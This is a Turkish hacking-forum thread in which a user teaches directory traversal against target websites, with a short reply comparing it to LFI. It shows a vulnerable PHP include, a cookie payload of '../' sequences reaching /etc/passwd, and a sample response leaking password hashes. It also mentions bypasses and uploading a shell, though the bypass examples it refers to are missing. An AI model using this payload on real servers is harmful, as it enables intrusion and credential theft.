THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Directory Traversal Attack / S4cuRıTy EneMy

S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.779
Konular:
1513
Teşekkür (Etti):
968
Teşekkür (Aldı):
3105
Ticaret:
(0) %
27-05-2014 19:52
#1
Directory Traversal Attack / S4cuRıTy EneMy
Merhaba arkadaşlar bugün sizlere cok önemli bir konu özellikle hedef siteler için bug res. için cok önemli bir konudur bu alanda ciddiyseniz adam gibi oturup dinleyin sonradan mesaj atarak can abi bana yardım et heyk ögret demeyin

Aslında bu açıgı bir cok webmaster ve coder bilir bunun önlemini alır ama genede önemli bir zaafiyet

Şöyle bir kod içinde incelemek isteriz..


Alıntı:
<?php
$template = ’s4.php’;
if (isset($_COOKIE[’TEMPLATE’]))
$template = $_COOKIE[’TEMPLATE’];
include ("/home/users/phpguru/templates/" . $template);
?>
Evet şimdi burada dosya yolu net değil biz burda http yollayip deniyecegiz..

Alıntı:
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Evet burada yaptıgımız işlev lfi'deki gibi etc/passwd çekmek istiyoruz kesinlikle hata vericektir. Her servere göre hata farklı olabilir ama genelde bu şekildedir eğer hata aliyorsanız doğru iz üzerindeyiz.

Kod:
HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh 
daemon:*:1:1::/tmp: 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
Evet şimdi ufak bir örnek göstericem ;

Burada belirtilen dizine girmek istedik ve hata verdi vermese şaşarım buyüzden bypass etmeyi deniyelim ;

Eğerki bypass yolu çalişmaz ise bu kısımdan shell atabilirsiniz düşük bir ihtimal ama yiyen serverler var

Başka bir yol gösteriyim size altarnetif olsun bu yollar size cok yarıcak ;

Burada komut olarak biz şifrelerin oldugu dosyayi çekmesini istedik ama hata vericektir bu yüzden bypass yapmamız şart

büyük ihtimal bypass edicektir.

Evet bu sayede sizlere directory traversal attack saldırı yöntemini göstermiş olduk umarım yararlı olur


Selametle // S4cuRıTy EneMy
Zeref - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2014
Nereden:
el psy congr
Yaş:
22
Mesajlar:
1.962
Konular:
80
Teşekkür (Etti):
196
Teşekkür (Aldı):
319
Ticaret:
(0) %
27-05-2014 19:57
#2
local file değil mi bu ya kafam karıştı lfı da da böyle yapıyorduk farkı ney
--------------------- asdasdasdasrtewter
S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.779
Konular:
1513
Teşekkür (Etti):
968
Teşekkür (Aldı):
3105
Ticaret:
(0) %
27-05-2014 20:00
#3
Alıntı:
Zeref´isimli üyeden Alıntı Mesajı göster
local file değil mi bu ya kafam karıştı lfı da da böyle yapıyorduk farkı ney
LFİ'ye cok benziyor aynen kardeşim.

[+] Makarnanın üstüne sos koyunca spagetti oluyor buda öyle

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler